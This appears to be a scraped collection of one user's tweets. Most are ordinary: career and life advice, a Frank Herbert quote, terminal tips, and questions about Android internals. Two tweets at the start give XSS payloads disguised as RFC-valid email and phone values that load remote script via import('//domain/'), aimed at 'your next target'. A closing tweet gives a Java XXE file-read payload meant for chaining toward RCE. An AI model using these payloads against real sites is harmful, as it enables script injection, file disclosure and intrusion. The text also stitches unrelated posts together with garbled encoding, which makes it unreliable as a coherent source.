RFC-compliant payloads to try and put in your username or telephone number fields on your next target:
Email: "><img/src/onerror=import('//domain/')>"@domain.com
Mobile: 013371337;ext=<img/src/onerror=import('//domain/')>
@lexfridman really cracked me up
P: Thereβs something terrifying about that image to me. Every now and then at night, you hold that skull and it just reminds you that youβre temporary.
L: Yeah. Both you and I will one day have one of those.
P: Yeah
L: Mine will be bigger.
π
The primary purpose of your job or business should be to enhance your life, not just to generate revenue.
When you realize this, you'll stop comparing yourself to others since what's important to them may not be important to you, and vice versa.
@Technologeeks Where does vold get the volume uuid from when vold_prepare_subdirs is called?
I have unsuccessfully queried the output from blkid. Any suggestions would be appreciated!
Successful traits for the current (and next) gen workforce:
- Excellent communicators, especially in writing
- Highly empathetic
- Very emotionally stable
- Respect (if not love) process
Most Terminal users will know that
ππππ .
will open the current working directory in a Finder window.
In Powershell, this is
ππ‘ππππππ .
Cool tool for annotations during online presentations-
ZoomIt is a screen zoom and annotation tool for technical presentations that include application demonstrations
https://t.co/fJ8gYEoe6L
Hey @samykamkar! Was there any firmware-level fix for the keyboard sniffing vulns as exploited by your tool keysweeper ? I dont see much data except as mouse update from Microsoft -
https://t.co/JfBNNQqhEk
@SahilBloom@RomeenSheth Great thread! π―
I wonder if we can apply this to decisions with (mostly) subjective outcomes. Say buying a house, curious to know what would be first-principle framework look like for this example.
@maddiestone Can an Android malware monitor logcat? (Eg - Runtime.getRuntime().exec("logcat")).
I believe only system apps can get READ_LOGS permission.
@jeevajay I missed your chat message on the @interintellect_ salon earlier today since the call ended. Lets continue our convo here, not sure if your DMs are open.
Hey @visakanv not sure how @readGift works(does it send you the actual book or just the $?), but (just an FYI) sent you the book "the gift of fear" earlier this week. Happy holidays! :)
βOnce men turned their thinking over to machines in the hope that this would set them free. But that only permitted other men with machines to enslave them.β
β Frank Herbert
@interintellect_ sad to miss this :( The article mentioned in the reading notes discusses ethnic diasporas.
Another potential discussion area would be raising kids so as to they are not "confused", since they would inherit the same hybrid identity (which is tied to the compatibility comment)
If your exploiting your XXE under Java, I recommend a payload like this:
<!DOCTYPE root [
<!ENTITY stuff SYSTEM ".">
]><root>&stuff;</root>
So that you can start the file leak from the CWD of the Java process. This is important when chaining for an RCE.